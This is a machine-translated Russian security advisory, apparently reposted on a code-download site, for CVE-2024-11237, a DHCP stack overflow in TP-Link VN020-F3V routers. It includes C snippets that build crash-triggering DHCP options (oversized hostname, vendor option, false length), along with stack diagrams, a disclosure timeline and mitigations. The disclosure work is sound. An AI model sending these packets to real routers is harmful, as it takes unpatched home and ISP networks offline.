Главная страница>Связанные с программированием>Другой исходный код
Скачать

TP-Link VN020 Corruption памяти DHCP (CVE-2024-11237)

Критическая уязвимость при обработке пакетов DHCP

Обзор

Критическая уязвимость была обнаружена в маршрутизаторах TP-Link VN020 F3V (T), использующих версию прошивки TT_V6.2.1021. Уязвимость позволяет удаленным злоумышленникам запустить переполнение буфера на основе стека через специально созданные пакеты DHCP, что приводит к отрицанию условий обслуживания (DOS).

Пострадавшие устройства:

  • Модель маршрутизатора: TP-Link VN020-F3V (T)
  • Версия прошивки: TT_V6.2.1021
  • Развертывание: в первую очередь через Tunisie Telecom и Topnet ISPS
  • Подтвержденные варианты: также влияет на алжирские и марокканские версии

Важное примечание: из -за запатентованного характера прошивки точные детали внутренней реализации неизвестны. Этот анализ основан на наблюдаемом поведении и тестировании черного ящика.

Детали уязвимости

  • CVE ID : CVE-2024-11237
  • Тип : переполнение буфера на основе стека (CWE-121)
  • Вектор атаки : удаленный (DHCP Discover Packet)
  • Аутентификация : никто не требуется
  • Порт : UDP/67 (DHCP -сервер)
  • Воздействие : DOS (подтверждено) и RCE (возможно)
  • Сложность : низкая

Технический анализ

Структура пакетов DHCP 

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

Эксплуатация векторов

  1. Обработка имени хоста DHCP 
 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );
  1. Опция специфика для поставщика 
 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );
  1. Длина поля манипуляции 
 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

Потенциальная коррупция памяти

Хотя точная внутренняя реализация неизвестна, наблюдаемое поведение предполагает потенциальные проблемы повреждения памяти:

Нормальная обработка имени хоста DHCP 

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

Что может произойти внутри маршрутизатора? 

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

Это теоретическое, и некоторые детали могут быть не совсем точными, поскольку TP-Link предоставляет прошивку для этого маршрутизатора исключительно для интернет-провайдеров.

Видео демонстрация

Poc.mp4
Wireshark.mp4

Маршрутизатор может также попытаться перезапустить себя, как показано здесь из -за сбоя, как показано здесь:

router_effect.mp4

Наблюдаемое воздействие

  • Непосредственное устройство не отвечает
  • Отказ службы DHCP
  • Автоматический перезапуск маршрутизатора
  • Сеть сбои, требующее ручного вмешательства

Временная шкала

  • Первоначальное обнаружение : 20 октября 2024 г.
  • Уведомление о поставщике : 3 ноября 2024 г.
  • Задание CVE : 15 ноября 2024 г.

Смягчение

В настоящее время официальный патч не доступен. Временные смягчения включают:

  1. Отключить сервер DHCP, если не требуется
  2. Реализовать фильтрацию трафика DHCP в Edge Network
  3. Рассмотрим альтернативные модели маршрутизатора, если это возможно

Ссылки

  1. CVE-2024-11237
  2. CWE-121: переполнение буфера на основе стека

Исследователь

Мохамед Мааталлах

  • GitHub: @zephkek
  • УСТАНОВКА: Независимый исследователь безопасности
Расширять
Дополнительная информация
Связанные приложения
Рекомендуем вам
Связанные новости Все